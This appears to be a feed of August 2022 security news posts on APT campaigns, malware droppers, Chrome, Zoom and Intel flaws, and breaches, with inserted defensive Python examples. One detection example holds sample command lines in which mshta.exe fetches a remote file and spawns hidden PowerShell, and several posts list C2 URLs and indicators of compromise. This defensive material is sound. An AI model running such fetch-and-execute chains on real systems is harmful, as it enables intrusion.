“Based on these findings and wider activity examined, it is very likely that RedAlpha operators are located within the PRC. Chinese intelligence services’ use of private contractors is also an established trend, with groups such as APT3, APT10, RedBravo (APT31), and APT40 all identified as contractors working for China’s Ministry of State Security (MSS) (1,2,3,4).” concludes the report. “In the case of RedAlpha, the group’s targeting closely aligns with the strategic interests of the Chinese government, such as the observed emphasis on China-focused think tanks, civil society organizations, and Taiwanese government and political entities.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini (SecurityAffairs – hacking, RedAlpha)

The post China-linked RedAlpha behind multi-year credential theft campaign appeared first on Security Affairs.
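The report above describes hundreds of typosquat domains spoofing Yahoo, Google, Microsoft, Outlook and Zimbra login portals. The following is an added example, not code from Recorded Future or from this post, of the kind of look-alike check a defender can run over a newly-registered-domain feed or proxy logs: it normalises common digit-for-letter homoglyphs, splits hyphenated labels into tokens, and scores each token against a protected-brand list with an edit distance that counts adjacent transpositions as a single edit. The brand list, the sample domains and the `PROTECTED`, `classify` and `scan` names are all constructed for this example.

```python
from typing import Dict, List, Optional, Tuple

# Brands to protect. Constructed list; it mirrors the providers named in the
# Recorded Future report (Yahoo, Google, Microsoft, Outlook, Zimbra).
PROTECTED: Dict[str, str] = {
    "yahoo": "yahoo.com",
    "google": "google.com",
    "microsoft": "microsoft.com",
    "outlook": "outlook.com",
    "zimbra": "zimbra.com",
}

# Constructed candidate domains, as they might arrive from a newly-registered-
# domain feed or proxy logs. None of these are indicators from the report.
SAMPLE_DOMAINS: List[str] = [
    "yahoo.com",                  # the real thing
    "yah00-mail.com",             # digit-for-letter homoglyphs
    "googel.com",                 # adjacent-letter transposition
    "login-outlook-verify.net",   # brand embedded among extra tokens
    "microsof.com",               # one character dropped
    "zimbra-webmail-update.com",  # brand embedded among extra tokens
    "goggle.net",                 # single substitution
    "mail.example.org",           # unrelated
]

# Common digit/letter substitutions seen in look-alike registrations.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t"})


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert/delete/substitute plus an
    adjacent transposition, so 'googel' is one edit away from 'google'."""
    la, lb = len(a), len(b)
    d = [[0] * (lb + 1) for _ in range(la + 1)]
    for i in range(la + 1):
        d[i][0] = i
    for j in range(lb + 1):
        d[0][j] = j
    for i in range(1, la + 1):
        for j in range(1, lb + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[la][lb]


def registrable_label(domain: str) -> str:
    """Second-level label of the domain. Deliberately simple: a production
    tool would consult the Public Suffix List to handle suffixes like .co.uk."""
    parts = domain.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def classify(domain: str) -> Tuple[str, Optional[str], str]:
    """Return (verdict, brand, reason). Verdicts: legitimate, suspicious, unknown."""
    dom = domain.lower().strip(".")
    for brand, legit in PROTECTED.items():
        if dom == legit or dom.endswith("." + legit):
            return ("legitimate", brand, "registered brand domain")
    tokens = [t for t in registrable_label(dom).split("-") if t]
    for brand in PROTECTED:
        # allow 1 edit for short brand names, 2 for names of 8+ characters
        budget = max(1, len(brand) // 4)
        for tok in tokens:
            if tok == brand:
                return ("suspicious", brand, "brand name used under a different domain")
            dist = osa_distance(tok.translate(HOMOGLYPHS), brand)
            if dist <= budget:
                return ("suspicious", brand, f"look-alike of '{brand}' (distance {dist})")
    return ("unknown", None, "no protected brand matched")


def scan(domains: List[str]) -> List[Dict[str, Optional[str]]]:
    """Classify each domain; returns one record per input domain."""
    out = []
    for d in domains:
        verdict, brand, reason = classify(d)
        out.append({"domain": d, "verdict": verdict, "brand": brand, "reason": reason})
    return out


if __name__ == "__main__":
    for rec in scan(SAMPLE_DOMAINS):
        print(f"{rec['verdict']:<11} {rec['domain']:<28} {rec['reason']}")
```

On the constructed sample set this flags six of the eight domains as suspicious, keeps the genuine yahoo.com as legitimate and leaves the unrelated mail.example.org alone. The edit budget is intentionally small; widening it catches more variants at the cost of false positives on short brand names, so in practice the output is a triage queue rather than a block list.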

[Category: APT, Breaking News, Hacking, China, credential theft, hacking news, information security news, IT Information Security, Pierluigi Paganini, RedAlpha, Security Affairs, Security News]

[l] at 8/17/22 11:58am
Researchers have discovered a previously undocumented Android dropper, dubbed BugDrop, that's still under development. Researchers from ThreatFabric recently discovered a previously undetected Android dropper, dubbed BugDrop, which is under active development and was designed to bypass security features that will be introduced in the next release of the Google OS. The experts noticed something unusual in the latest sample of the Xenomorph malware family: it was an improved version of the threat that added RAT capabilities through “Runtime modules”. The Runtime modules allow the malware to perform gestures, touches, and other operations. The new version of Xenomorph was dropped by the BugDrop malware, which is able to defeat the security measures Google will introduce to prevent malware from requesting Accessibility Services privileges from victims. The dropper was developed by a cybercriminal group known as Hadoken Security, the same threat actor behind the Xenomorph and Gymdrop Android malware. The malicious application spotted by the researchers poses as a QR code reader. Upon launch, the application asks the user for Accessibility Services access in order to perform gestures and touches on behalf of the victim.

“Once granted, while showing a loading screen, the dropper initiates a connection with its onion.ws C2, which relies on the TOR protocol, obtaining back its configuration and the URL of the payload to download and install.” reads the analysis of the experts. “Throughout the course of our investigation, this URL changed from being one of the samples in the open folder, to an external URL again referring to QR code scanners functionalities, which used an endpoint very similar to what was used by Gymdrop samples that we observed in the wild in the last few months.”

The presence of instructions in the dropper code to send error messages back to the C2 suggests it is still under development.

The experts noticed that starting with Android 13, Google is blocking accessibility API access to apps installed from outside the official app store. However, BugDrop attempts to bypass this security measure by deploying malicious payloads via a session-based installation process. In this context, it is important to recall the new security features of Android 13, which will be released in the fall of 2022.

“With this new release, Google introduced the “restricted setting” feature, which blocks sideloaded applications from requesting Accessibility Services privileges, limiting this kind of request to applications installed with a session-based API (which is the method usually used by app stores).” states the analysis. “With this in mind, it is clear what criminals are trying to achieve. What is likely happening is that actors are using an already built malware, capable of installing new APKs on an infected device, to test a session based installation method, which would then later be incorporated in a more elaborate and refined dropper.”

Upon completing the development of the new features, BugDrop will give attackers new capabilities to target banking institutions and bypass security solutions currently being adopted by Google.

Pierluigi Paganini (SecurityAffairs – hacking, BugDrop)

The post BugDrop dropper includes features to circumvent Google's security controls appeared first on Security Affairs.

[Category: Breaking News, Cyber Crime, Malware, Mobile, Android, BugDrop, Cybercrime, Hacking, hacking news, information security news, IT Information Security, malware, Security Affairs, Security News]

[l] at 8/17/22 11:01am
Google addressed a dozen vulnerabilities in the Chrome browser, including the fifth Chrome zero-day flaw exploited this year. Google this week released security updates to address a dozen vulnerabilities in its Chrome browser for desktops, including a high-severity zero-day flaw actively exploited in the wild. The actively exploited flaw, tracked as CVE-2022-2856, is an insufficient validation of untrusted input in Intents. The flaw was discovered by Ashley Shen and Christian Resell of Google Threat Analysis Group on 19 July 2022.

“Google is aware that an exploit for CVE-2022-2856 exists in the wild.” reads the advisory published by Google.

Google did not share technical details about the issue to prevent further exploitation in the wild. The IT giant also fixed a critical issue, tracked as CVE-2022-2852, which is a use after free in FedCM. This issue was reported by Google Project Zero researcher Sergei Glazunov on August 2, 2022. Below is the list of the other issues addressed by the company:

[$7000][1337538] High CVE-2022-2854: Use after free in SwiftShader. Reported by Cassidy Kim of Amber Security Lab, OPPO Mobile Telecommunications Corp. Ltd. on 2022-06-18
[$7000][1345042] High CVE-2022-2855: Use after free in ANGLE. Reported by Cassidy Kim of Amber Security Lab, OPPO Mobile Telecommunications Corp. Ltd. on 2022-07-16
[$5000][1338135] High CVE-2022-2857: Use after free in Blink. Reported by Anonymous on 2022-06-21
[$5000][1341918] High CVE-2022-2858: Use after free in Sign-In Flow. Reported by raven at KunLun lab on 2022-07-05
[$NA][1350097] High CVE-2022-2853: Heap buffer overflow in Downloads. Reported by Sergei Glazunov of Google Project Zero on 2022-08-04
[$3000][1338412] Medium CVE-2022-2859: Use after free in Chrome OS Shell. Reported by Nan Wang(@eternalsakura13) and Guang Gong of 360 Alpha Lab on 2022-06-22
[$2000][1345193] Medium CVE-2022-2860: Insufficient policy enforcement in Cookies. Reported by Axel Chong on 2022-07-18
[$TBD][1346236] Medium CVE-2022-2861: Inappropriate implementation in Extensions API. Reported by Rong Jian of VRI on 2022-07-21

CVE-2022-2856 is the fifth zero-day vulnerability in Chrome that Google has addressed this year; the other ones are:

CVE-2022-2294 (July 4) – Heap buffer overflow in the Web Real-Time Communications (WebRTC) component
CVE-2022-1364 (April 14) – type confusion issue that resides in the V8 JavaScript engine
CVE-2022-1096 (March 25) – type confusion in the V8 JavaScript engine
CVE-2022-0609 (February 14) – use after free issue that resides in the Animation component

Users should update to version 104.0.5112.101 for macOS and Linux and 104.0.5112.102/101 for Windows.

Pierluigi Paganini (SecurityAffairs – hacking, Chrome)

The post Google fixed a new Chrome Zero-Day actively exploited in the wild appeared first on Security Affairs.

[Category: Breaking News, Hacking, Security, Chrome, CVE-2022-2856, Google, hacking news, information security news, IT Information Security, Pierluigi Paganini, Security Affairs, zero-Day]

[l] at 8/17/22 2:31am
The North Korea-linked Lazarus Group has been observed targeting job seekers with macOS malware that also works on Intel and M1 chipsets. ESET researchers continue to monitor a cyberespionage campaign, tracked as Operation In(ter)ception, that has been active since at least June 2020. The campaign targets employees working in the aerospace and military sectors and leverages decoy job offer documents. ESET published a series of tweets detailing the recent attacks: the experts spotted a signed Mac executable disguised as a job description for Coinbase. The malicious code was uploaded to VirusTotal from Brazil on August 11, 2022.

“#ESETresearch #BREAKING A signed Mac executable disguised as a job description for Coinbase was uploaded to VirusTotal from Brazil. This is an instance of Operation In(ter)ception by #Lazarus for Mac. @pkalnai @dbreitenbacher 1/7 pic.twitter.com/dXg89el5VT” — ESET research (@ESETresearch) August 16, 2022

The malware is compiled for both Intel and Apple Silicon; it drops three files: a decoy PDF document Coinbase_online_careers_2022_07.pdf, a bundle FinderFontsUpdater.app and a downloader safarifontagent. The discovery is similar to other attacks detected by ESET researchers in May.

“#ESETresearch A year ago, a signed Mach-O executable disguised as a job description was uploaded to VirusTotal from Singapore. Malware is compiled for Intel and Apple Silicon and drops a PDF decoy. We think it was part of #Lazarus campaign for Mac. @pkalnai @marc_etienne_ 1/8 pic.twitter.com/DV7peRHdnJ” — ESET research (@ESETresearch) May 4, 2022

“The bundle employed in the attack is signed July 21 using a certificate issued in February 2022 to a developer named Shankey Nohria and team identifier 264HFWQH63. The application is not notarized and Apple has revoked the certificate on August 12.” states ESET.

Experts noticed that, unlike the May attacks, the downloader safarifontagent connects to a different C&C server (https://concrecapital[.]com/%user%.jpg).

The C2 server did not respond at the time ESET experts analyzed this malware. The researcher @h2jazi also discovered a Windows counterpart of this malware on August 4; it was dropping the exact same decoy.

“#Lazarus #APT:
0dab8ad32f7ed4703b9217837c91cca7
Coinbase_online_careers_2022_07.exe
The decoy pdf is "Engineering Manager, Product Security" job description at Coinbase.
Next stage: (gone!) https://docs.mktrending[.]com/marrketend.png
https://t.co/XETUeA5F6B pic.twitter.com/NTFUJ9AiCO” — Jazi (@h2jazi) August 4, 2022

ESET also shared Indicators of Compromise (IoCs) for this threat.

“IoCs:
FE336A032B564EEF07AFB2F8A478B0E0A37D9A1A6C4C1E7CD01E404CC5DD2853 (Extractor)
798020270861FDD6C293AE8BA13E86E100CE048830F86233910A2826FACD4272 (FinderFontsUpdater)
49046DFEAEFC59747E45E013F3AB5A2895B4245CFAA218DD2863D86451104506 (safarifontagent) 6/7” — ESET research (@ESETresearch) August 16, 2022

Pierluigi Paganini (SecurityAffairs – hacking, North Korea)

The post North Korea-linked APT targets Job Seekers with macOS malware appeared first on Security Affairs.

[Category: Breaking News, Cyber warfare, Intelligence, Malware, Hacking, hacking news, information security news, IT Information Security, macOS, malware, North Korea, Pierluigi Paganini, Security News]

[l] at 8/17/22 1:10am
Researchers uncovered a new flaw, dubbed ÆPIC, in Intel CPUs that enables attackers to obtain encryption keys and other secret information from the processors. ÆPIC Leak (CVE-2022-21233) is the first architectural CPU bug that could lead to the disclosure of sensitive data; it impacts most 10th, 11th and 12th generation Intel CPUs. ÆPIC Leak works on the newest Intel CPUs based on Ice Lake, Alder Lake, and Ice Lake SP and does not require hyperthreading to be enabled.

“A potential security vulnerability in some Intel® Processors may allow information disclosure. Intel is releasing firmware updates to address this potential vulnerability.” reads the advisory published by Intel. “Improper isolation of shared resources in some Intel(R) Processors may allow a privileged user to potentially enable information disclosure via local access.”

The discovery of the flaw is the result of research conducted by boffins from the Sapienza University of Rome, the Graz University of Technology, Amazon Web Services, and the CISPA Helmholtz Center for Information Security. Unlike Meltdown and Spectre, ÆPIC Leak is an architectural bug, which means that the sensitive data is disclosed without relying on side channel attacks.

“ÆPIC Leak is like an uninitialized memory read in the CPU itself.” reads the description published by the researchers. “A privileged attacker (Administrator or root) is required to access APIC MMIO. Thus, most systems are safe from ÆPIC Leak. However, systems relying on SGX to protect data from privileged attackers would be at risk, thus, have to be patched.”

The CVE-2022-21233 issue resides in the Advanced Programmable Interrupt Controller (APIC), which is responsible for accepting, prioritizing, and dispatching interrupts to processors.

“The scan of the I/O address space on Intel CPUs based on the Sunny Cove microarchitecture revealed that the memory-mapped registers of the local Advanced Programmable Interrupt Controller (APIC) are not properly initialized. As a result, architecturally reading these registers returns stale data from the microarchitecture.” reads the research paper. “As the I/O address space is only accessible to privileged software, ÆPIC Leak targets Intel’s TEE, SGX. ÆPIC Leak can leak data from SGX enclaves that run on the same physical core. While ÆPIC Leak would represent an immense threat in virtualized environments, hypervisors typically do not expose the local APIC registers to virtual machines, eliminating the threat in cloud-based scenarios.”

The experts tested the ÆPIC Leak issue with 100 different random keys and tried to leak the AES keys with a single run of the attack. Full key recovery takes on average 1.35 s (n = 100, σ = 15.70%) with a success rate of 94%. The flaw enables an attacker with permission to execute privileged native code on a target machine to extract private keys and, worse, to defeat attestation, a cornerstone of the security primitives used in SGX to ensure the integrity of code and data.

“We show attacks that allow leaking data held in memory and registers. We demonstrate how ÆPIC Leak completely breaks the guarantees provided by SGX, deterministically leaking AES secret keys, RSA private keys, and extracting the SGX sealing key for remote attestation.” concludes the paper.

The researchers also propose several firmware and software mitigations that would prevent ÆPIC Leak from leaking sensitive data or completely prevent ÆPIC Leak. Intel has already released firmware updates to address the flaw. The experts published a video demo showing how an attacker can disclose data from a protected SGX enclave. The development comes as researchers demonstrated what is the first-ever side channel attack (CVE-2021-46778) on scheduler queues impacting AMD Zen 1, Zen 2, and Zen 3 microarchitectures, which could be abused by an adversary to recover RSA keys.

The attack, codenamed SQUIP (short for Scheduler Queue Usage via Interference Probing), entails measuring the contention level on scheduler queues to potentially glean sensitive information. No security updates have been released to patch the line of attack, but the chipmaker has recommended that software developers employ existing best practices, including constant-time algorithms and avoiding secret-dependent control flows where appropriate.

Pierluigi Paganini (SecurityAffairs – hacking, ÆPIC Leak)

The post ÆPIC Leak is the first CPU flaw able to architecturally disclose sensitive data appeared first on Security Affairs.

[Category: Breaking News, Hacking, Security, ÆPIC Leak, hacking news, information security news, Intel, IT Information Security, Pierluigi Paganini, Security Affairs, Security News]

[l] at 8/17/22 12:57am
Zoom addressed two high-severity vulnerabilities in its macOS app that were disclosed at the DEF CON conference. Zoom last week released macOS updates to fix two high-severity flaws in its macOS app that were disclosed at the DEF CON conference. Technical details of the vulnerabilities were disclosed at the DEF CON conference by security researcher Patrick Wardle during his talk “You're M̶u̶t̶e̶d̶ Rooted”. In his talk, the expert explored Zoom’s macOS application to uncover several critical security flaws that can be exploited by a local unprivileged attacker to achieve root access to the device.

“Mahalo to everybody who came to my @defcon talk "You're M̶u̶t̶e̶d̶ Rooted". Was stoked to talk about (& live-demo) a local priv-esc vulnerability in Zoom (for macOS). Currently there is no patch. Slides with full details & PoC exploit: https://t.co/viee0Yd5o2 #0day pic.twitter.com/9dW7DdUm7P” — patrick wardle (@patrickwardle) August 12, 2022

Wardle demonstrated that an attacker could hijack the update mechanism to downgrade the software to an older version known to be affected by vulnerabilities. The expert pointed out that macOS users are not prompted for their admin password when Zoom is updated, because the auto-update feature is enabled by default. Zoom informed customers last week that macOS updates for the Zoom application patch two high-severity vulnerabilities. Details of the flaws were disclosed on Friday at the DEF CON conference in Las Vegas by macOS security researcher Patrick Wardle. Wardle, who is the founder of the Objective-See Foundation, a non-profit that provides free and open source macOS security resources, showed at DEF CON how a local, unprivileged attacker could exploit vulnerabilities in Zoom’s update process to escalate privileges to root.

“In this talk, we’ll explore Zoom’s macOS application to uncover several critical security flaws. Flaws, that provided a local unprivileged attacker a direct and reliable path to root.” Wardle explained. “The first flaw presents itself subtly in a core cryptographic validation routine, while the second is due to a nuanced trust issue between Zoom’s client and its privileged helper component.”

Wardle demonstrated that a local attacker abusing the auto-update process and leveraging a cryptographic issue related to insecure update package signature validation can install an update package. Zoom addressed some related vulnerabilities in the past months, but Wardle explained that he was still able to exploit them in his attack. The day after the talk, the company released Client for Meetings for macOS 5.11.5, which fixes the auto-update process vulnerability (CVE-2022-28756). The company also announced version 5.11.3, which addresses the package signature validation issue (CVE-2022-28751). Zoom also addressed other critical and high-severity vulnerabilities:

CVE-2022-28753, CVE-2022-28754: Zoom On-Premise Deployments: Improper Access Control Vulnerability (HIGH)
CVE-2022-28755: Improper URL parsing in Zoom Clients (CRITICAL)
CVE-2022-28752: Local Privilege Escalation in the Zoom Rooms for Windows Client (HIGH)
CVE-2022-28750: Zoom On-Premise Deployments: Stack Buffer Overflow in Meeting Connector (HIGH)

Pierluigi Paganini (SecurityAffairs – hacking, macOS)

The post Zoom fixed two flaws in macOS App that were disclosed at DEF CON appeared first on Security Affairs.
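The two weaknesses described above, a package signature that is not validated properly and an updater that will happily install an older, vulnerable build, are the two checks every privileged auto-update path needs. The following is an added example, not Zoom's code and not from Wardle's talk, of an update verifier that refuses a package unless its signature covers both the version string and the payload hash and the version is strictly newer than the installed one. It uses an HMAC with a constructed demo key purely so it runs on the standard library; a real updater would verify a public-key signature against a pinned vendor public key. `sign_manifest`, `verify_update` and the manifest layout are assumptions made for this example.

```python
import hashlib
import hmac
from typing import Dict, Tuple

# Constructed stand-in for a vendor signing key. A real updater verifies a
# public-key signature (for example Ed25519) with a pinned public key; HMAC is
# used here only so the example runs with the standard library alone.
SIGNING_KEY = b"constructed-demo-key-not-a-real-secret"


def parse_version(v: str) -> Tuple[int, ...]:
    """'5.11.5' -> (5, 11, 5), so versions compare numerically, not as strings."""
    return tuple(int(p) for p in v.split("."))


def _signed_message(version: str, payload_sha256: str) -> bytes:
    # Bind the version to the payload: a signature over the payload alone would
    # let a validly signed old build be re-labelled with a newer version number.
    return f"{version}|{payload_sha256}".encode()


def sign_manifest(version: str, payload: bytes) -> Dict[str, str]:
    """What the vendor's release pipeline would publish next to the package."""
    digest = hashlib.sha256(payload).hexdigest()
    sig = hmac.new(SIGNING_KEY, _signed_message(version, digest), hashlib.sha256).hexdigest()
    return {"version": version, "sha256": digest, "sig": sig}


def verify_update(manifest: Dict[str, str], payload: bytes, installed_version: str) -> str:
    """Return 'ok' if the package may be installed, otherwise the reason for refusal."""
    # 1. The signature must check out before anything in the manifest is trusted.
    expected = hmac.new(SIGNING_KEY, _signed_message(manifest["version"], manifest["sha256"]),
                        hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, manifest["sig"]):
        return "bad-signature"
    # 2. The bytes on disk must be the bytes that were signed.
    if not hmac.compare_digest(hashlib.sha256(payload).hexdigest(), manifest["sha256"]):
        return "hash-mismatch"
    # 3. Anti-rollback: a genuine but older (or identical) release is still refused,
    #    which is the check that blocks the downgrade path described in the talk.
    if parse_version(manifest["version"]) <= parse_version(installed_version):
        return "downgrade"
    return "ok"


if __name__ == "__main__":
    current = "5.11.3"
    good = sign_manifest("5.11.5", b"constructed new build")
    stale = sign_manifest("5.10.0", b"constructed old build")
    print(verify_update(good, b"constructed new build", current))   # ok
    print(verify_update(stale, b"constructed old build", current))  # downgrade
```

The order of the checks matters: the version field is only consulted after the signature over it has been verified, so an attacker who can write to the update directory cannot influence the rollback decision, and the payload hash is compared with a constant-time compare like the signature to keep the two paths uniform.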

[Category: Breaking News, Security, Hacking, hacking news, information security news, IT Information Security, macOS, Pierluigi Paganini, Security Affairs, Security News, Zoom]

[l] at 8/16/22 11:38am
A cyber attack disrupted the IT operations of South Staffordshire Water, a company supplying drinking water to 1.6M consumers daily. South Staffordshire Water has issued a statement confirming the security breach; the company pointed out that the attack did not impact the safety and water distribution systems. South Staffordshire Water plc, known as South Staffs Water, is a UK water supply company owned by a privately owned utilities company, serving parts of Staffordshire and the West Midlands as well as small areas of surrounding counties in England. South Staffordshire Water plc is part of South Staffordshire plc. Thanks to the security systems in place, the company was able to keep supplying safe water to the customers of its subsidiaries, Cambridge Water and South Staffs Water.

“This incident has not affected our ability to supply safe water and we can confirm we are still supplying safe water to all of our Cambridge Water and South Staffs Water customers.” reads a statement published by the company. “This is thanks to the robust systems and controls over water supply and quality we have in place at all times, as well as the quick work of our teams to respond to this incident and implement the additional measures we have put in place on a precautionary basis.”

South Staffordshire Water reassures customers that the cyber attack will not cause an extended outage. The company is investigating the incident and is working closely with the relevant government and regulatory authorities. The Clop ransomware gang claimed responsibility for the attack and added the name of the utility to its Tor leak site. The ransomware gang claims to be able to impact the operations and the safety of the water supply. The gang also claims to have stolen 5TB of data from the company. The ransomware group has already published a sample of the stolen data that includes passports, ID cards, and images of SCADA systems.

Thames Water has denied that Clop has breached its network and excluded any risk for its customers due to the attack.

“We are aware of reports in the media that Thames Water is facing a cyber attack. We want to reassure you that this is not the case and we are sorry if the reports have caused distress.” reads the statement from Thames Water. “As providers of an essential service, we take the security of our networks and systems very seriously and are focused on protecting them, so that we can continue to provide you with the services and support you need from us.”

BleepingComputer noticed that the sample data published by the Clop operators includes usernames and passwords that refer to South Staff Water and South Staffordshire email addresses. One of the leaked documents sent to the targeted firm is explicitly addressed to South Staffordshire PLC. This circumstance suggests that Clop misidentified the victim. Cybercriminals don’t pick their targets randomly, as hitting water suppliers during harsh drought periods could apply insurmountable pressure to pay the demanded ransom. For this to happen, though, Clop has to redirect its threats to the correct entity, but considering the publicity the matter has taken, it’s probably too late for that.

Pierluigi Paganini (SecurityAffairs – hacking, South Staffordshire Water)

The post Clop gang targeted UK drinking water supplier South Staffordshire Water appeared first on Security Affairs.

[Category: Breaking News, Cyber Crime, ICS-SCADA, Malware, clop ransomware, Cybercrime, data breach, Hacking, hacking news, ICS, information security news, IT Information Security, malware, Pierluigi Paganini, SCADA, Security News, South Staffordshire Water]

[l] at 8/16/22 2:15am
Russia-linked Gamaredon APT group targets Ukrainian entities with PowerShell info-stealer malware dubbed GammaLoad. The Russia-linked Gamaredon APT group (aka Shuckworm, Actinium, Armageddon, Primitive Bear, and Trident Ursa) targets Ukrainian entities with PowerShell info-stealer malware dubbed GammaLoad, Symantec warns. The Computer Emergency Response Team of Ukraine (CERT-UA) confirmed the ongoing cyber espionage campaign. Symantec and TrendMicro first discovered the Gamaredon group in 2015, but evidence of its activities has been dated back to 2013. The group targeted government and military organizations in Ukraine. The recent wave of attacks began on July 15 and was ongoing as recently as August 8, 2022. The attack chain starts with spear-phishing messages delivering a self-extracting 7-Zip file, which was downloaded via the system’s default browser. Then mshta.exe downloaded an XML file, which was likely masquerading as an HTML application (HTA) file. The download of the XML file onto victim networks was followed by the execution of a PowerShell stealer.

“We saw three versions of the same PowerShell stealer appear on the one system.” reads the analysis published by Symantec. “It’s possible the attackers may have deployed multiple versions of the stealer, which were all very similar, as an attempt to evade detection. The files were hosted on a subdomain known to be associated with Shuckworm activity since May 2022.”

The final payload deployed by the attackers is a PowerShell stealer malware dubbed GammaLoad.PS1_v2. In some cases, the attackers also delivered two backdoors named Giddome and Pterodo, which are known to be part of the Gamaredon arsenal. Pterodo is a multistage Visual Basic Script (VBS) backdoor designed to collect sensitive information or maintain access to compromised machines. It is distributed in a spear-phishing campaign with a weaponized office document that appears to be designed to lure military personnel.

The Giddome backdoor supports multiple capabilities, including recording audio, taking screenshots, logging keystrokes, and downloading and executing arbitrary executables on the infected hosts. Threat actors also used the legitimate remote desktop protocol (RDP) tools Ammyy Admin and AnyDesk for remote access.

“As the Russian invasion of Ukraine approaches the six-month mark, Shuckworm’s long-time focus on the country appears to be continuing unabated. That this recent activity continues even after CERT-UA documented it shows that fear of exposure does not deter the group from its activities.” concludes the report. “While Shuckworm is not necessarily the most tactically sophisticated espionage group, it compensates for this in its focus and persistence in relentlessly targeting Ukrainian organizations.”

Symantec also shared Indicators of Compromise (IoCs) for this campaign.

Pierluigi Paganini (SecurityAffairs – hacking, Gamaredon)

The post Russia-linked Gamaredon APT continues to target Ukraine appeared first on Security Affairs.
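The attack chain above (self-extracting archive, then mshta.exe fetching a remote XML/HTA, then a PowerShell stealer) is a sequence a defender can look for in process-creation telemetry. The following is an added example, not code from Symantec or from this post, of that correlation logic run over a handful of constructed process-creation events: it raises a medium alert whenever mshta.exe is launched with a remote URL, and escalates to high when that same host sees PowerShell spawned by mshta.exe within a short window. The event format, hostnames, `example.invalid` URLs and the `parse_events` and `detect_mshta_chain` names are all constructed for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed process-creation events in a simplified
# "timestamp|host|parent_image|image|command_line" form. They are sample data
# written for this example, not telemetry from the Symantec report.
SAMPLE_EVENTS = """\
2022-08-08T10:01:05|WS01|explorer.exe|attachment.exe|C:\\Users\\u\\Downloads\\attachment.exe
2022-08-08T10:01:07|WS01|attachment.exe|mshta.exe|mshta.exe http://example.invalid/update.xml
2022-08-08T10:01:09|WS01|mshta.exe|powershell.exe|powershell.exe -w hidden -c Get-Date
2022-08-08T11:30:00|WS02|explorer.exe|mshta.exe|mshta.exe C:\\Tools\\dashboard.hta
2022-08-08T12:00:00|WS03|explorer.exe|powershell.exe|powershell.exe -File C:\\Scripts\\backup.ps1
2022-08-08T13:15:00|WS04|winword.exe|mshta.exe|mshta.exe https://example.invalid/form.xml
"""

# mshta.exe given an http(s) URL is the remote-fetch behaviour of interest;
# a local .hta path on its own is normal for some line-of-business apps.
URL_RE = re.compile(r"\bhttps?://", re.IGNORECASE)


def parse_events(text: str) -> List[Dict]:
    """Turn the pipe-separated sample lines into event dicts."""
    events = []
    for line in text.strip().splitlines():
        ts, host, parent, image, cmdline = line.split("|", 4)
        events.append({
            "ts": datetime.fromisoformat(ts),
            "host": host,
            "parent": parent.lower(),
            "image": image.lower(),
            "cmdline": cmdline,
        })
    return events


def detect_mshta_chain(events: List[Dict], window: timedelta = timedelta(minutes=5)) -> List[Dict]:
    """One alert per mshta.exe launch that references a remote URL.
    Severity is 'high' when PowerShell is spawned by mshta.exe on the same host
    within `window` of that launch (the chain described in the report), and
    'medium' for the remote mshta.exe launch on its own."""
    by_host: Dict[str, List[Dict]] = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)
    alerts = []
    for host, evs in by_host.items():
        for m in evs:
            if m["image"] != "mshta.exe" or not URL_RE.search(m["cmdline"]):
                continue
            children = [
                e for e in evs
                if e["parent"] == "mshta.exe" and e["image"] == "powershell.exe"
                and m["ts"] <= e["ts"] <= m["ts"] + window
            ]
            alerts.append({
                "host": host,
                "severity": "high" if children else "medium",
                "mshta_cmdline": m["cmdline"],
                "powershell_cmdline": children[0]["cmdline"] if children else None,
            })
    return alerts


if __name__ == "__main__":
    for a in detect_mshta_chain(parse_events(SAMPLE_EVENTS)):
        print(f"[{a['severity']}] {a['host']}: {a['mshta_cmdline']}")
```

On the sample data WS01 produces a high alert (remote mshta.exe followed two seconds later by a PowerShell child), WS04 a medium one (remote fetch with no follow-on), while the local .hta on WS02 and the scheduled backup script on WS03 stay silent. Real telemetry (Sysmon event 1, Windows 4688 with command-line auditing) carries process IDs, which let the parent match be made on the exact process rather than on the image name as done here.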

[Category: APT, Breaking News, Cyber warfare, Malware, Gamaredon, Hacking, hacking news, information security news, IT Information Security, Pierluigi Paganini, Security Affairs, Security News, Ukraine]

[l] at 8/16/22 12:56am
For about 1,900 users, Twilio hackers could have attempted to re-register their number to another device or learned that their number was registered to Signal. Communication company Twilio provides Signal with phone number verification services, and the recent security breach it suffered also impacted some users of the popular instant-messaging app. Twilio hackers could have attempted to re-register the number of Signal users to another device or learned that their number was registered to Signal.

“For about 1,900 users, an attacker could have attempted to re-register their number to another device or learned that their number was registered to Signal. This attack has since been shut down by Twilio. 1,900 users is a very small percentage of Signal’s total users, meaning that most were not affected.” reads the advisory published by Signal.

The company said that all users can rest assured that their message history, contact lists, profile information, whom they’d blocked, and other personal data remain private and secure and were not affected. The Signal PIN was not exposed as part of this security breach. The company is notifying the 1,900 impacted users and is prompting them to re-register Signal on their devices. Users that have received an SMS message from Signal with a link to a support article have to follow these steps:

Open Signal on your phone and register your Signal account again if the app prompts you to do so.
To best protect your account, we strongly recommend that you enable registration lock in the app’s Settings. We created this feature to protect users against threats like the Twilio attack.

The attackers gained access to Twilio’s customer support console via phishing. For approximately 1,900 users, either 1) their phone numbers were potentially revealed as being registered to a Signal account, or 2) the SMS verification code used to register with Signal was revealed.

The experts added that the attacker explicitly searched for three numbers, and Signal received a report from one of those three users that their account was re-registered.

“We encourage users to enable registration lock for their Signal account. Using an optional registration lock with your Signal PIN adds an additional verification layer to the registration process. Go to Signal Settings (profile) > Account > Registration Lock to do this.” concludes the security advisory.

Pierluigi Paganini (SecurityAffairs – hacking, Signal)

The post Phone numbers of 1,900 Signal users exposed as a result of Twilio security breach appeared first on Security Affairs.

[Category: Breaking News, Data Breach, Hacking, Mobile, hacking news, information security news, IT Information Security, Pierluigi Paganini, Security News, Signal, Twilio]

